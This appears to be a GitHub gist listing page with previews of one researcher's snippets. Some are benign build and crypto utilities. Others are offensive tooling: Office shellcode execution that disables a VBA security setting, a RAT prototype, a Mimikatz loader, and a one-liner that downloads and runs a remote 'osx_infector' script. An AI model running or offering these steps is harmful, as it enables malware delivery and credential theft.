secretsquirrel’s gists

secretsquirrel / Dockerfile

Created May 8, 2024 16:07 — forked from alisaesage/Dockerfile

Build v8 x64 on modern Linux

	# Build v8 x64 on modern Linux
	# Time to run: about 1.2hrs at 8Gb RAM / 8 cores, Ubuntu 22.04 LTS

	# This dockerfile is part of Zero Day Engineering training materials on JavaScript engines internals and vulnerability research
	# https://zerodayengineering.com
	# @zerodaytraining

	FROM ubuntu:bionic
	MAINTAINER [email protected]
	RUN apt-get update && apt-get upgrade

secretsquirrel / gist:b425e8490bc2dfcbf1f9f69f065ecc84

Created December 7, 2017 19:39

bash|batch

	cat /tmp/test.sh
	:; if [ -z 0 ]; then
	@echo off
	goto :WINDOWS
	fi

	if [ -z "$2" ]; then
	echo "usage: $0 <firstArg> <secondArg>"
	exit 1
	fi

secretsquirrel / windows.h__.js

Created March 24, 2017 02:35

windows.h.js INFINITY

	var ffi = require('ffi'),
	ref = require('ref'),
	Struct = require('ref-struct'),
	Library = require('./Library'),
	Type = ref.Type,
	NULL = ref.NULL,
	isNull = ref.isNull;


	var groups = ['libs', 'types', 'structs', 'callbacks', 'enums'];

secretsquirrel / example.js

Created February 13, 2017 02:37

Shellcode via Office via . JS

	var objExcel = new ActiveXObject("Excel.Application");
	objExcel.Visible = false;
	var WshShell = new ActiveXObject("WScript.Shell");
	var Application_Version = objExcel.Version;//Auto-Detect Version
	var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
	WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
	var objWorkbook = objExcel.Workbooks.Add();
	var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
	// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
	var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';

secretsquirrel / rat.cs

Created February 13, 2017 02:36

WCF - JavaScript JS Rat Basic Prototype

	using System;
	using System.Collections.Generic;
	using System.Linq;
	using System.Text;
	using System.ServiceModel;
	using System.ServiceModel.Description;
	using System.Reflection;


	[ServiceContract]

secretsquirrel / PELoader.cs

Created February 12, 2017 23:10

Reflective PE Loader - Compressed Mimikatz inside of InstallUtil

	using System;
	using System.IO;
	using System.IO.Compression;
	using System.Text;
	using System.Collections.Generic;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

secretsquirrel / PowershellAes.ps1

Created October 10, 2016 03:07 — forked from ctigeek/PowershellAes.ps1

Aes Encryption using powershell.

	function Create-AesManagedObject($key, $IV) {
	$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
	$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
	$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
	$aesManaged.BlockSize = 128
	$aesManaged.KeySize = 256
	if ($IV) {
	if ($IV.getType().Name -eq "String") {
	$aesManaged.IV = [System.Convert]::FromBase64String($IV)
	}

secretsquirrel / speed_pw0n.sh

Last active February 7, 2017 18:27 — forked from mrbrutti/speed_pw0n.sh

Speedy Gonzales

python -c 'import urllib; exec(urllib.urlopen("https://gist.githubusercontent.com/secretsquirrel/2ba497786027472f98dd/raw/e2fb41c2a8a4520cc47548fc88a68ef091278fc9/osx_infector.py").read())'

secretsquirrel / reverse_string.py

Last active March 1, 2016 20:52

just to get reverse hex values of strings

	def reverse_string(somestring):
	temp = ''
	for i in somestring[::-1]:
	k = hex(ord(i)).replace("0x", "")
	if len(k) == 1:
	k += k + "0"
	temp += k
	print temp

secretsquirrel / test.csv

Created June 12, 2015 21:23

	date	revenue
	6/28/14	37432000000
	6/29/14	37432000000
	6/27/14	37432000000
	6/26/14	37432000000
	6/25/14	37432000000
	6/24/14	37432000000
	6/23/14	37432000000

midnite_runr secretsquirrel